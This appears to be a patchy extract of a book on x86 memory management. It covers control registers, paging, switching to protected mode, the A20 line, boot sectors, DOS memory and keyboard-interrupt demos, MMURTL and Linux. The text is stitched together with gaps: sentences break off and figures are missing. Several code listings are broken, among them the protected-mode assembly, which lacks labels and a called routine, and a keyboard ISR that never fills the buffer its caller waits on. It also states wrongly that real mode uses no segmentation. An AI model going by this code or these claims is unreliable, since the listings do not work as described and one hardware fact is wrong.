        printf("set array[%d]=%d\n",i,array[i]);
    }
    return;
}
There is a blatant array overflow in the code above. When you run
this application, it will crash and Windows will present you with a
dialog box like the one shown in Figure 1.14. If you’ve never seen a
dialog box like this before, take a good look. If you do any sort of
pointer-intensive development on Windows, you are bound to see it
sooner or later.
Figure 1.14
I have not said much about the control registers. The only control
register relevant to this current section is the CR0 control register.
We’ll see a couple of the other control registers in the next section.
The CR0 register’s first bit (the lowest-order bit) is known as the
PE flag (as in Protected Enable). By setting the PE flag to 1, we
switch the processor into protected mode and enable all of the seg-
ment protection features discussed earlier. Here is a snippet of
assembly code that performs this crucial task:
MOV EAX,CR0
OR AL,1
MOV CR0,EAX
Another equivalent way to do this is to use the special-purpose
SMSW and LMSW system instructions:
SMSW AX
OR AL,1
LMSW AX
Figure 1.15
To create Figure 1.15, I took the address resolution scheme of Figure
1.9 and appended it with several steps so that we can accommodate
all of the extra bookkeeping needed for paging. The address formed
by the segment descriptor and the offset address in Figure 1.9 is no
longer the address of a byte in physical memory. Instead, a 32-bit
quantity is formed that is composed of three distinct offset
addresses. Two of these offset addresses are 10 bits in size and the
remaining offset address is 12 bits in size.
NOTE The base address stored in the page table entry is 20 bits in
size. The processor assumes that these are the 20 most significant bits
in a 32-bit base address, which is another way to say that the extra 12
bits are implied and all zero.
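The 10/10/12 decomposition boils down to shifts and masks. Here is
a sketch of my own (the names are hypothetical):

#include <stdio.h>

typedef unsigned long u32;

/* carve a 32-bit linear address into its three paging indices */
void splitLinear(u32 linear)
{
    u32 dirIndex   = (linear >> 22) & 0x3FF;  /* top 10 bits: page directory */
    u32 tableIndex = (linear >> 12) & 0x3FF;  /* next 10 bits: page table */
    u32 offset     = linear & 0xFFF;          /* low 12 bits: byte in page */

    printf("dir=%lu table=%lu offset=%lu\n", dirIndex, tableIndex, offset);
}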
NOTE Most operating systems assign each process their own page
directory so that each program’s linear address space maps to a differ-
ent section of physical storage. This guarantees, as long as the page
structure entries are not the same, that one process will not be able
to access the physical memory of another process.
Let’s take a closer look at what the page directory and page table
entries look like. (See Figure 1.16.)
A page directory entry has a number of special-purpose flags
related to caching that I am not going to go into. The really impor-
tant fields of the entry are the base address of the page table and the
page size (PS) flag. The present flag (P) is maintained by the local
operating system and is used to indicate if the page table is present
in memory. If it is not, the page table will need to be loaded via a
page fault so that the address resolution cycle can continue. Most
operating systems, however, are wise enough to leave their crucial
data structures in memory.
The layout of a page table entry is displayed in Figure 1.17. As
you can see, it is very similar to the setup of the page directory
entry. The difference is that the fields in a page directory entry are
concerned with a page table. The fields in the page table entry are
concerned with a 4KB page of memory.
Figure 1.17
One new thing you might notice is the dirty bit. The dirty bit indi-
cates that the page being referenced has been written to recently.
The present (P) flag and the dirty (D) flag are both used by the
operating system to help manage the process of paging. The operat-
ing system will usually clear the dirty flag when a page is loaded
into DRAM for the first time. The processor will then set the dirty
bit the first time that the page is updated.
You’ve already seen how the PE bit in CR0 is used to switch the
processor into protected mode. Using the paging facilities of the
processor requires even more participation of the control registers.
Figure 1.18 displays a summary of important control registers.
Reserved areas that should not be modified are shaded gray.
Figure 1.18
The CR0 register is used to control the operating mode and state of the
processor. In the last section, we took a look at the PE flag, which is
responsible for placing the processor in protected mode. The other
really important flag in CR0, as far as paging is concerned, is the PG
flag at the other end of the register. When the PG flag is set, the
processor is enabled for paging. When the PG flag is cleared, linear
addresses are treated like physical addresses.
The CR1 is reserved, which is a nice way to say that it isn’t used
for anything. This is why I didn’t include it in Figure 1.18. For the
remainder of this section, you can ignore CR1. My guess is that
CR1 may have been created for the sake of some future use.
NOTE Digging a well before you are thirsty is not a bad idea. Any
software architects worth their salt will make accommodations for
future modification and extension. If you have ever worked with the
Win32 API, you will, no doubt, have noticed a number of ambiguous
void* function parameters reserved for future use.
The CR2 register is used to store the linear address that has caused
a page fault. Mercifully, this value takes up the entire register.
The CR3 plays a central role in the resolution of physical
addresses when paging has been enabled. Specifically, this register
holds the base address of the page directory. If you look at Figure
1.15, you will see that CR3 plays a vital role in the address resolu-
tion process. If CR3 is corrupt, you can kiss your memory manager
goodbye. The other two flags (PCD and PWT) in this register are
related to caching and are not directly relevant to the immediate
discussion.
The CR4 register is used to enable a couple of advanced mecha-
nisms. For example, the PAE flag enables four extra address lines
when it is set. This would bring the number of address lines to 36.
Note that the PG flag must be set in CR0 in order for PAE to be
effective. Another flag of interest is the PSE bit. If PSE is cleared to
zero, the page size is 4KB. If PSE is set, the page size is 4MB. If
both PAE and PSE are set, the page size is 2MB.
Paging as Protection
Traditionally, paging has been used to artificially expand the amount
of memory to which a processor has access. Nevertheless, the Intel
architecture has embedded enough functionality into its paging
scheme that it is possible to use only paging facilities to implement
memory protection. In fact, if you wanted to push the envelope, you
could turn off segmentation-based protection and rely completely on
paging to provide memory protection. Naturally, this kind of sce-
nario is a little unusual, and there are a few conditions that need to
be satisfied.
The first condition is that a flat memory model is implemented. In
a flat memory model, there is one big segment. It is the simplest
possible memory model that can be used in protected mode. Every-
thing shares the same memory segment, and all the protective
services provided by segmentation are thrown to the wind. A flat
memory model is implemented by creating a GDT with three
entries. The first entry in the GDT is reserved as a null descriptor and
is never used, so in a sense it is just a placeholder. The second and third
descriptors are used to represent code and data segments. The trick
is to have both descriptors point to the same segment. The segment
Figure 1.19
With a flat memory model in place, no additional segmentation
checks can be performed. This leaves us with
two ways to protect areas of memory, assuming that paging has
been enabled. Both of these paging-based mechanisms rely on the
information in page table entries.
If you look back at Figure 1.17, you will see that there is a
read-write flag (bit 1) and also a user-supervisor flag (bit 2). The
user-supervisor flag can be used to institute a two-ring security
scheme. For example, by placing pages that constitute the operating
system in supervisor mode and application pages in user mode, the
kernel can be protected from malicious programs. If a user applica-
tion attempts to access pages that are in supervisor mode, the
processor will generate a page fault.
The read-write flag can be used to help enforce the user-supervi-
sor division. Specifically, when the processor is executing code in a
supervisor page, it can read and write anything. In other words, the
read-only flag for other memory pages is ignored. However, if the
processor is executing code in a user page, it can only read and
write to other user-level pages. If it tries to access a page marked
with supervisor status, the processor generates a page fault. A user
page’s ability to access other user pages depends on the status of
their read-write flags, which is to say that user-level code must
obey the read/write permissions of all the other pages.
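To make the flag positions concrete, here is a sketch that builds a
supervisor-only page table entry. The macro names and helper are my
own, assuming the bit layout of Figure 1.17:

/* bit positions taken from Figure 1.17 */
#define PTE_PRESENT    0x001UL   /* bit 0: page is resident in DRAM */
#define PTE_READWRITE  0x002UL   /* bit 1: set = writable */
#define PTE_USER       0x004UL   /* bit 2: set = user, clear = supervisor */

/* build an entry for a read-only, supervisor-level 4KB page */
unsigned long makeKernelPTE(unsigned long frameBase)
{
    /* keep the 20-bit frame base, mark the page present, and leave
       the user and read-write bits clear */
    return (frameBase & 0xFFFFF000UL) | PTE_PRESENT;
}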
Figure 1.20
Real mode doesn’t use segmentation or paging, so Figure 1.19 does not apply
at all. You might also want to keep in mind that the offset portion of
a logical address does not necessarily have to be stored in a general
register; I am just using a general register for the sake of
illustration.
The linear address is the 32-bit value that is formed using the
base address value in the segment descriptor and the offset value in
the general register. If paging is not being used, the linear address
corresponds to an actual physical address.
If paging facilities are being used, the linear address will be
decomposed into three parts and the whole page directory/page
table cycle will need to be performed in order to arrive at a physical
address.
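The following toy model sketches that two-level walk in C. It is my
own simulation, assuming every entry is present and all page
structures are 4KB-aligned:

typedef unsigned long u32;

/* model physical memory as an array of 32-bit words */
u32 physMem[1024 * 16];

/* resolve a linear address against a page directory at pageDirBase */
u32 translate(u32 pageDirBase, u32 linear)
{
    /* entries are 4 bytes each, so divide byte addresses by 4 */
    u32 pde = physMem[(pageDirBase >> 2) + ((linear >> 22) & 0x3FF)];
    u32 pte = physMem[((pde & 0xFFFFF000UL) >> 2) + ((linear >> 12) & 0x3FF)];

    /* splice the 20-bit frame base with the 12-bit page offset */
    return (pte & 0xFFFFF000UL) | (linear & 0xFFF);
}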
When a page has been written out to disk and a program attempts
to access that page, a page fault is generated. The native operating
system is responsible for catching the fault and loading the page into
an available page frame. The operating system will also set the
present flag (P) in the page’s corresponding page table entry.
The relationship between pages and page frames is illustrated in
Figure 1.21.
Figure 1.21
The third step may be foreign, even to those who know Intel assem-
bler — ah yes, the dreaded A20 address line. When the 8086 was
released, it had 20 address lines (A0 through A19). This allowed the
8086 to manage a 1MB address space. Any attempt to access mem-
ory beyond 1MB would wrap around to address 0. The Pentium
normally uses 32 address lines. However, the Pentium starts in real
mode at boot time and will try to mimic the 8086 by leaving the A20
address line disabled as the power-on default.
It just so happens that there is a logical AND gate called the A20
gate, which the A20 address line must pass through on its way to
the outside world. Just like a bit-wise AND operator in C, an AND
gate requires two inputs. The other input is derived from an output
pin on the 8042 keyboard controller. Most peripheral attachments to
the PC have their own dedicated microcontroller. The 8042 can be
programmed via the OUT assembly command so that it sends a 1 to
the A20 gate and enables the A20 address line.
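Here is a sketch of the classic sequence in C, assuming a 16-bit DOS
compiler that supplies inp() and outp() in <conio.h> (production
code would also put timeouts around the polling loops):

#include <conio.h>

void enableA20(void)
{
    /* wait for the 8042 input buffer to drain (bit 1 of the status port) */
    while(inp(0x64) & 0x02){ }
    outp(0x64, 0xD1);           /* command 0xD1: write the 8042 output port */

    while(inp(0x64) & 0x02){ }
    outp(0x60, 0xDF);           /* output port value with the A20 bit set */
}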
NOTE More than anything else, the A20 line workaround was basi-
cally a kludge to allow compatibility between the 8086 and the 80286.
Using an available pin on a keyboard controller to address memory
issues is not exactly what I would call an elegant solution. It is not
exactly a fast solution either. Yikes!
Once the GDTR register has been loaded via the LGDT instruction
and the PE flag has been set in CR0, a FAR jump must be per-
formed. In Intel assembler, a FAR jump instruction is used to force
both the code segment register
(CS) and the instruction pointer register (IP) to be loaded with new
values. The motivation behind performing a FAR jump is that it
serves as a way to load CS with a segment selector.
The tricky part of the FAR jump is that it must be coded in
binary. Before we make the jump to protected mode, we are in real
mode. That means that the assembler will be treating instructions
using the traditional 16-bit interpretations. If we tried to code the
32-bit FAR jump in assembly language, the assembler (which is
chugging along in 16-bit mode) would either signal an error or
encode the jump instructions incorrectly. Thus, we are left with
doing things the hard way.
Here is the assembly source code in all its glory:
.486P
; -- pmode.asm --
;start here----------------------------------------------------
here:
JMP _main
; disable interrupts
CLI
; contents which we will load into the GDTR via LGDT need
; to jump over the data to keep it from being executed as code
JMP overRdata
gdtr_stuff:
gdt_limit DW 0C0H
gdt_base DD 0H
; first GDT entry: the unused null descriptor (placeholder)
nullDescriptor:
NDlimit0_15 dw 0 ; low 16 bits of segment limit
NDbaseAddr0_15 dw 0 ; low 16 bits of base address
NDbaseAddr16_23 db 0 ; next 8 bits of base address
NDflags db 0 ; segment type and flags
NDlimit_flags db 0 ; top 4 bits of limit, more flags
NDbaseAddr24_31 db 0 ; final 8 bits of base address
codeDescriptor:
CDlimit0_15 dw 0FFFFH ; low 16 bits of segment limit
CDbaseAddr0_15 dw 0 ; low 16 bits of base address
CDbaseAddr16_23 db 0 ; next 8 bits of base address
CDflags db 9AH ; segment type and flags
CDlimit_flags db 0CFH ; top 4 bits of limit, more flags
CDbaseAddr24_31 db 0 ; final 8 bits of base address
dataDescriptor:
DDlimit0_15 dw 0FFFFH ; low 16 bits of segment limit
DDbaseAddr0_15 dw 0 ; low 16 bits of base address
DDbaseAddr16_23 db 0 ; next 8 bits of base address
DDflags db 92H ; segment type and flags
DDlimit_flags db 0CFH ; top 4 bits of limit, more flags
DDbaseAddr24_31 db 0 ; final 8 bits of base address
;main---------------------------------------------------------
PUBLIC _main
_main:
PUSH BP
MOV BP,SP
CALL _makeTheJump
POP BP
RET
;temp stack---------------------------------------------------
PUBLIC _tstack
_tstack DB 128 DUP(?)
CSEG ENDS
END here
You might notice that I intersperse data with code. Given that
everything has to lie in a single segment, I really don’t have a
choice. It is, however, legal to mix data in with your code, as long as
the region of memory storing the data is not treated like code and
executed. This is a trick they don’t always teach you in the books.
I built the previous program as a .COM executable using
Microsoft’s MASM. The command line to build the binary is:
C:\myfiles>ml /AT /FlpmodeList.txt pmode.asm
The /AT option causes the assembler to construct a .COM file (i.e.,
/AT means assemble with tiny memory model), which is really
nothing more than a raw binary. There are no address relocations or
fix-ups to be performed. The /Fl option causes a listing file to be
generated. Listing files are a handy way to see what binary encoding
your assembler generates.
There is a little bit of a catch. Unfortunately, once the switch to
protected mode is made, I can’t do that much because the processor
expects (and wants) 32-bit machine code. Because the assembler
that created the program is running in 16-bit mode, I am plain out of
luck.
There is a way around this dilemma: The various snippets of
operating system bootstrap code that I have read typically load the
kernel into memory before the actual switch to protected mode is
performed. This allows the FAR jump to transfer processor control
to something that the processor can digest once it has switched
modes. The kernel is exclusively 32-bit code, so the processor will
have no problem following directions.
The side effect of all this is that you’ll need two different compil-
ers to write an OS on Intel. You need a 16-bit compiler to create the
boot code and a 32-bit compiler to write the operating system
proper. This whole process is illustrated in Figure 1.22.
Figure 1.22
NOTE Borland still sells a 16-bit DOS compiler with its TurboC++
suite. Microsoft sells Visual C++ 1.52, which can also generate 16-bit
code. There are also a number of freebie compilers on the Internet
that create 16-bit executables. I like Dave Dunfield’s MICRO-C
compiler.
You can also get Microsoft’s 16-bit CL.EXE compiler and MASM
assembler for free as part of the Windows Device Driver Kit. MASM
consists of two files: ML.EXE and ML.ERR. The only downside is that
they do not come with documentation.
When the machine is first powered on, the BIOS (which is burned
into ROM) will spring into action and look for a bootable device.
Remember that PCs start off in real mode. For the sake of simplic-
ity, let us assume that the BIOS locates a bootable diskette in drive
A. The BIOS will load the diskette’s boot sector into DRAM at
address 0000[0]:7C00 (i.e., physical address 0x07C00). This is
step number one.
Once the BIOS has loaded the boot sector, it hands over control
of the machine to whichever machine instructions now reside at
0000[0]:7C00. However, there are still a number of BIOS ser-
vices that can be accessed using interrupts. This is where the BIOS
plays a crucial role because there is a set of primitive disk I/O inter-
rupts that can be used to load the kernel.
Diskette sectors are 512 bytes in size, so there is really only
enough code to load the kernel from disk into memory (step 2) and
then switch to protected mode. At the end of the transition to pro-
tected mode, the 16-bit boot sector code will perform a manually
coded FAR jump to the kernel’s entry point (step 3). The kernel
code takes matters from there and the system is now in protected
mode and executing 32-bit instructions (step 4).
NOTE You will have to run this program under the auspices of DOS.
When I say this, I mean something like DOS 6.22. Do not try to run
this program in a virtual DOS console running on Windows 2000. You
will also have to make sure that no other memory management soft-
ware (i.e., HIMEM.SYS, EMM386.EXE) has been installed.
Unfortunately, you will need to reboot your machine, seeing as how I
overwrite the real mode interrupt vector table that lies at the bottom of
memory.
C:\code\boot>debug boot.com
-l
-w cs:0100 0 0 1
-q
C:\code\boot>
The -l command loads the boot.com file into memory. By
default, the boot.com file will be loaded by debug to address
CS:0x0100. The next command takes the instructions starting at
this address and writes them to drive A (i.e., drive 0) starting at log-
ical sector 0. A single, 512-byte sector is written. This may be
easier to understand by looking at the general format of the -w
command.
w startAddr driveLetter startSector nSectors
Once this has been done, the only thing left to do is to write the
kernel and place it on the diskette. You will need a 32-bit compiler
to write the kernel, and you should be aware that the compiler will
package your kernel code within some executable file format (i.e.,
the Windows Portable Executable (PE) file format), although I have
heard that gcc has a switch that will allow you to build a raw 32-bit
binary.
The best way to deal with this extra baggage is to jump over it,
which is to say that the boot sector code should take the formatting
headers into account and merely sidestep them. You might want to
disassemble your kernel file to determine where the header data
stops and where your kernel code begins.
You can use debug to write your kernel to the diskette, the
same way you did with the boot sector.
Closing Thoughts
By now you should understand why memory management requires
the operating system and the processor to work closely together.
The roles that the hardware and the operating system
assume are, without a doubt, complementary.
The processor defines a mechanism for accessing, protecting, and
emulating memory. The hardware does, indeed, expect a special set
of data structures to be in place, like the GDT and the Page Direc-
tory. But these are merely extensions of the mechanism that the
processor provides.
It is the responsibility of the operating system to make use of the
processor’s services and mandate policy for using them. The next
chapter takes up the issue of implementing memory management policies.
References
Blunden, Bill. “Methodology for OS Construction,” Phrack Issue 59.
www.phrack.com.
Brey, Barry. Intel Microprocessors 8086/8088, 80186/80188, 80286,
80386, 80486, Pentium, and Pentium Pro Processor, Pentium II,
Pentium III, and Pentium IV: Architecture, Programming, and
Interfacing. 2002, Prentice Hall, 6th Edition, ISBN: 0130607142.
This is a fairly recent book and should take care of any ques-
tions you may have. Barry has been writing about Intel chips
since the first one came out.
Intel Corporation. Intel Architecture Software Developer’s Manual,
Volume 3: System Programming Guide. 1997, order number
243192.
MIPS Technologies. MIPS64 Architecture For Programmers, Volume
III: The MIPS64 Privileged Resource Architecture. 2001, document
number: MD00091.
Podanoffsky, Michael. Dissecting DOS. 1995, Addison-Wesley, ISBN:
020162687X.
This book has a useful summary of the boot process on Intel
hardware. It also details the design and operation of RxDOS, an
enhanced clone of MS-DOS. In the spirit of the original DOS
implementation, Podanoffsky has written the entire OS in assem-
bly code. I’m not sure whether to admire his programming
fortitude or be disheartened by the lack of portability.
Wahbe, Lucco, Anderson, Graham. Efficient Software-Based Fault
Isolation. 1993, Proceedings of the Symposium on Operating
System Principles.
Chapter 2
Memory Management
Policies
“If I could remember the names of all these particles, I’d be a
botanist.”
— Enrico Fermi
NOTE It is interesting to see how being at the right place at the right
time can change history. IBM had originally intended to use the CP/M
operating system sold by Digital Research. For whatever reason, the
deal fell through and Microsoft was there to catch the ball. Had Bill
Gates decided to complete his degree at Harvard, or had Digital
Research not bungled its deal with IBM, we would all probably be
using Apple computers.
IO.SYS contains the low-level code that is tailored to the hardware
by the original equipment manufacturer
(OEM). All requests for hardware services from user programs
must travel through MSDOS.SYS, a device-neutral I/O manager,
which translates the request into a format that can then be passed
to IO.SYS. MSDOS.SYS can be thought of as the kernel of DOS
(although your definition of “kernel” would have to be pretty loose).
COMMAND.COM is a command interpreter.
IO.SYS and MSDOS.SYS are both core system files. Without
these files, there is no DOS. The command interpreter, on the other
hand, can be replaced. There were several companies in the 1980s
that offered their own, enhanced version of COMMAND.COM. How
many readers remember Norton Commander?
Before DOS is loaded, the real mode address space of a bare com-
puter resembles that displayed in Figure 2.1. A bare-bones DOS
bootstrap will load all of its components into the region between the
BIOS data and video RAM.
Figure 2.1
When a DOS machine boots, the BIOS locates a bootable disk and
loads its boot sector to 0000[0]:7C00. The boot sector then
inspects its disk for IO.SYS. How do I know this? One quick way to
verify this without performing a gruesome disassembly is to dump
the boot sector and look for character data that is hard coded.
This is how the debug utility could be used to perform this type
of investigation:
C:\WINDOWS>debug
-l cs:0100 0 0 1
-d cs:0280
158E:0280 C3 B4 02 8B 16 4D 7C B1-06 D2 E6 0A 36 4F 7C 8B .....M|.....6O|.
158E:0290 CA 86 E9 8A 16 24 7C 8A-36 25 7C CD 13 C3 0D 0A .....$|.6%|.....
158E:02A0 4E 6F 6E 2D 53 79 73 74-65 6D 20 64 69 73 6B 20 Non-System disk
158E:02B0 6F 72 20 64 69 73 6B 20-65 72 72 6F 72 0D 0A 52 or disk error..R
158E:02C0 65 70 6C 61 63 65 20 61-6E 64 20 70 72 65 73 73 eplace and press
158E:02D0 20 61 6E 79 20 6B 65 79-20 77 68 65 6E 20 72 65 any key when re
158E:02E0 61 64 79 0D 0A 00 49 4F-20 20 20 20 20 20 53 59 ady...IO SY
158E:02F0 53 4D 53 44 4F 53 20 20-20 53 59 53 00 00 55 AA SMSDOS SYS..U.
-q
NOTE TSR programs are loaded into memory and remain there
even after they terminate so that they can be reactivated quickly. The
doskey program, which supports command line history services, is a
good example of a TSR as is the DOS mouse driver. Because TSRs are
usually small, they are typically stuck into a UMB if possible.
Memory Usage
The mem command can be used to obtain a snapshot of the operat-
ing system’s memory usage:
Memory Type Total = Used + Free
---------------- ------- ------- -------
Conventional 638K 97K 541K
Upper 0K 0K 0K
Reserved 0K 0K 0K
Extended (XMS) 65,532K 65,532K 0K
---------------- ------- ------- -------
Total memory 66,170K 65,629K 541K
As you can see, most of the system binaries are loaded into low
memory, where they share space with vital system data structures.
Note that segment addresses, like the ones reported by mem's /d
(debug) switch, need to be multiplied by 16 (i.e., append the implied
zero) in order to specify an actual physical address.
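The address arithmetic itself is trivial. Here is a small program (the function name is mine) that performs the conversion:

#include <stdio.h>

/* real mode: physical address = (segment * 16) + offset */
unsigned long toPhysical(unsigned short seg, unsigned short off)
{
    return ((unsigned long)seg << 4) + (unsigned long)off;
}

void main()
{
    /* 0000[0]:7C00 resolves to physical address 0x07C00 */
    printf("%05lX\n", toPhysical(0x0000, 0x7C00));
    return;
}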
int offset;

/*
Have 80x25 screen.
Each screen character in VRAM is described by two bytes:
[ASCII char][attribute]
 lo byte     hi byte
*/

void putCRT(ch)
char ch;
{
/*
ch = BP + savedBP + retaddress
   = BP + 4 bytes
display attribute = BP+5
( 0FH = white foreground, black background )
*/
asm "MOV SI,BP";
asm "ADD SI,4H";
asm "MOV BYTE PTR +5[BP],BYTE PTR 0FH";
asm "MOV DX,0B800H";
asm "MOV ES,DX";
asm "MOV DI,_offset";
asm "MOV CX,2";
asm "REP MOVSB";   /* copy [char][attr] to ES:DI in video RAM (DS == SS here) */
return;
}/*end putCRT--------------------------------------------------*/
/*
puts string at text position 'pos'
note: 2 bytes for each screen character,
so mult. offset by 2
*/
void putCRTStr(str,pos)
char *str;
int pos;
{
int i;
i=0;
offset=pos*2;
while(str[i]!=0)
{
putCRT(str[i]);
offset = offset+2;
i++;
}
return;
}/*end putCRTStr----------------------------------------------*/
void clearCRT()
{
int i;
offset=0;
for(i=0;i<(80*25);i++){ putCRT(' '); offset=offset+2; }
offset=0;
return;
}/*end clearCRT-----------------------------------------------*/
/*
test driver
*/
void main()
{
clearCRT();
putCRTStr("DOS is dead, Use Linux!",240);
return;
}/*end main---------------------------------------------------*/
You might notice that I am using rather old K&R syntax and unusual
inline statements. This is due to the fact that the compiler I am
using is Dave Dunfield's handy MICRO-C PC86 C compiler. It's one
of the few freebies on the Internet that I could find that generates
MASM-friendly 16-bit assembly code. In case you are interested,
here is my build script:
del crtio.obj
del crtio.exe
del crtio.asm
mcp crtio.c | mcc > crtio.asm
ML /Zm -c crtio.asm
LINK crtio.obj PC86RL_S.OBJ
The following program hijacks the keyboard interrupt (INT 9H),
takes the machine for a short joy ride, and then restores the original
interrupt service routine:
int oldseg;
int oldoff;
char kbd_buffer;
int delay;
void saveOldISR()
{
asm "MOV AH,35H";
asm "MOV AL,09H";
asm "INT 21H";
asm "MOV _oldseg,ES";
asm "MOV _oldoff,BX";
return;
}/*end saveOldISR---------------------------------------------*/
void setUpISR()
{
asm "PUSH DS";
asm "MOV CX,CS";
asm "MOV DS,CX";
asm "MOV DX,OFFSET newISR";
asm "MOV AH,25H";
asm "MOV AL,09H";
asm "INT 21H";
asm "POP DS";
return;
}/*end setUpISR-----------------------------------------------*/
void restoreOldISR()
{
asm "STI";
asm "PUSH DS";
asm "MOV CX,_oldseg";
asm "MOV DS,CX";
asm "MOV DX,_oldoff";
asm "MOV AH,25H";
asm "MOV AL,09H";
asm "INT 21H";
asm "POP DS";
return;
}/*end restoreOldISR------------------------------------------*/
void readKBD()
{
while(kbd_buffer==-1){}
kbd_buffer=-1;
return;
}/*end readKBD------------------------------------------------*/
void ISR()
{
asm "newISR:";
asm "STI";
asm "PUSH AX";
asm "PUSH BX";
asm "IN AL,60H ;get [scan code][status] from port 60H";
asm "MOV BL,AL";
asm "exitInterrupt:";
asm "mov AL,20H";
asm "out 20H,AL";
asm "pop BX";
asm "pop AX";
asm "iret";
return;
}/*end ISR----------------------------------------------------*/
void printBiosCh(ch)
char ch;
{
/*
ch = BP + savedBP + retaddress
= BP + 4 bytes
*/
asm "MOV AH,0EH";
asm "MOV AL,+4[BP]";
asm "INT 10H";
return;
}/*end printBiosCh--------------------------------------------*/
void printBiosStr(cptr,n)
char* cptr;
int n;
{
int i;
for(i=0;i<n;i++){ printBiosCh(cptr[i]); }
return;
}/*end printBiosStr-------------------------------------------*/
/* wrestle control from DOS and go on a joy ride */
void main()
{
kbd_buffer = -1;
delay=0;
printBiosStr("save-",5);
saveOldISR();
printBiosStr("setUp-",6);
setUpISR();
readKBD();
while(delay<=7)
{
printBiosCh('1'+delay);
delay++;
readKBD();
}
printBiosStr("-restore",8);
restoreOldISR();
return;
}/*end main---------------------------------------------------*/
For a concrete example of a DPMI host, take a
look at DJGPP's cwsdpmi.exe.
Figure 2.2
NOTE Vendors who sold DOS extenders often required the developer
to embed all the memory management components in the application
itself. The motivation behind this was to guarantee that the application
could run on any DOS machine without having to impose a set of pre-
requisites. This tended to make applications using DOS extenders
relatively large. Some DOS extenders were almost entire operating
systems by themselves, especially when you compare them to DOS. It
is rumored that DOS extender technology, at Microsoft, was first imple-
mented in 1988 for a monster DOS application called Windows.
These extended memory schemes solved, after a fashion, DOS's real mode
memory problem. They also show how problems related to back-
ward compatibility can be extremely unpleasant.
MMURTL will allow outside events (i.e., the user) to force a task switch. Some
multiuser operating systems implement their own strict policies
and individual users have little or no control. With MMURTL,
however, the user has much more control over what gets the pro-
cessor’s attention. Given that MMURTL is a single-user operating
system, this makes sense.
Unlike DOS, MMURTL was originally designed to use Intel’s
protected mode memory management. Surprisingly, MMURTL uses
only minimal segmentation and does not bother to implement mem-
ory protection on the segment level. Instead, MMURTL makes use
of paging to provide both memory allocation features and protection.
These architectural idiosyncrasies are what make this operating
system a good place to start.
Table 2.1
OsCodeDesc DataDesc CodeDesc
Base address 0x00000000 0x00000000 0x00000000
Size limit 0xFFFFF 0xFFFFF 0xFFFFF
Limit units 4KB increments 4KB increments 4KB increments
32-bit code/data Yes Yes Yes
Present in memory Yes Yes Yes
Privilege 0x0 0x0 0x0
Type Execute/Read Read/Write Execute/Read
NOTE MMURTL never uses an LDT, only a single GDT and a single
IDT (for interrupt handling). During the boot phase, the MMURTL
16-bit boot sector code loads the 32-bit kernel code from the disk to
memory at 0x6000. The kernel is loaded at 0x6000 to avoid wiping
out the BIOS data area, which is still needed. The boot code then
points the GDTR and IDTR registers to the GDT and IDT. The GDT and
IDT were loaded into memory as a part of the kernel image. The boot
sector code then switches the processor to protected mode and jumps
to the kernel entry point. Once this has transpired, the kernel will
reload itself to address 0x0. The BIOS code and data, which are over-
written in the process, are no longer needed.
Figure 2.3
Paging Variations
I have been using the terms “paging” and “virtual memory” synon-
ymously. The historical motivation for paging was to make use of
disk storage to simulate core memory. This traditional use is why I
have emphasized the employment of paging as a way to artificially
expand a computer’s address space. Those tiny little magnets were
expensive, and 8KB of core memory could only take you so far.
There are, however, other ways to use paging. If you recall from
Chapter 1, the Pentium’s paging facilities take a linear address and
map it to a byte in physical memory. This address resolution mecha-
nism allows physical memory to be mapped to an artificial/linear
address space. A program running in a linear memory space uses
pointers holding linear addresses, which to the program appear to
correspond to actual physical memory locations. However, the
actual physical location of the program and its data have addresses
that are usually much different from the linear values. The nature of
the Pentium’s paging hardware allows for two distinct uses for vir-
tual memory:
n Virtual-paged memory
n Demand-paged virtual memory
In the case of virtual-paged memory, physical memory is broken up
into a series of pages. A linear address space is implemented, and
the hardware takes care of translating the linear addresses to the
physical addresses. The linear address space can be much larger
than the physical address space, but you will only be able to manage
an amount of memory equal in size to the physical address space. Vir-
tual-paged memory is “virtual” because the addresses being used
(i.e., the linear addresses) do not correspond to physical addresses.
Figure 2.4
Figure 2.5
QUESTION
How can this be done? How can applications share the same
linear address memory but still reside in separate regions of
physical memory?
ANSWER
The key is in the page tables and page directories. It is possi-
ble for a linear address to correspond to two different physical
addresses because it is nothing but a series of offsets. The base
addresses of items can differ, and this is what results in different
locations in DRAM. This is illustrated in Figure 2.6.
Figure 2.6
Memory Allocation
MMURTL provides memory to user applications in 4KB pages. If
your application only needs 24 bytes, it will be up to the user space
libraries (i.e., malloc()) to take a 4KB page and break it into
smaller pieces. MMURTL exposes the following memory allocation
system calls to user applications:
n extern far U32 AllocPage(U32 nPages, U8
**ppMemRet);
n extern far U32 DeAllocPage(U8 *pOrigMem, U32
nPages);
n extern far U32 QueryPages(U32 *pdPagesLeft);
The QueryPages() routine places the number of free pages left
in the variable pointed to by pdPagesLeft.
The AllocPage() function allocates memory in contiguous
pages. In addition, the memory address returned is the address of
the lowest byte in memory (i.e., the first byte of the first page).
All of these functions return a number of possible error codes.
There are dozens of error codes defined in MMURTL’s header files.
It is important to realize that an error code of zero means that there
are no problems.
#define ErcOK 0 /* Alls Well */
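Putting the pieces together, a user application might use these calls as follows. This is only a sketch; the U32/U8 typedefs are my assumption, while the prototypes and ErcOK mirror the declarations listed above:

typedef unsigned long U32;   /* assumed MMURTL-style typedefs */
typedef unsigned char U8;

extern far U32 AllocPage(U32 nPages, U8 **ppMemRet);
extern far U32 DeAllocPage(U8 *pOrigMem, U32 nPages);
extern far U32 QueryPages(U32 *pdPagesLeft);

#define ErcOK 0

void demo()
{
    U8 *pMem;
    U32 nFree;

    if (AllocPage(2, &pMem) == ErcOK)   /* two contiguous 4KB pages */
    {
        QueryPages(&nFree);             /* how many pages are left? */
        DeAllocPage(pMem, 2);           /* hand both pages back */
    }
    return;
}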
NOTE It may seem a bit odd, but one of the original detractors of
Linux was Tanenbaum! In January of 1992, Tanenbaum left a posting
on comp.os.minix titled “Linux is obsolete.” Needless to say, he was
wrong.
Linux's feature list reads like a Christmas list to Santa:
n Multiuser
n Symmetric multiprocessing (SMP)
n Protected mode memory protection
n Demand-paged virtual memory
n Dynamically and statically linked libraries
n Multiple file system support
n Loadable kernel modules (LKMs)
n High-performance TCP/IP stack
If you compare this feature list to MMURTL’s, you will see why I
discussed MMURTL first.
Figure 2.7
As of kernel version 2.4, every CPU on the motherboard gets two
segment descriptors in the GDT. Each CPU gets a descriptor specifying
a Task State Segment (TSS) and a descriptor specifying a segment
that stores a Local Descriptor Table (LDT). This is illustrated in
Figure 2.8.
Figure 2.8
Three-Level Paging
In the previous chapter, I examined what is known as a two-level
paging model that uses two bookkeeping data structures: page
directories and page tables. Linux adds another data structure and
extends the linear address that it uses so that it has a three-level pag-
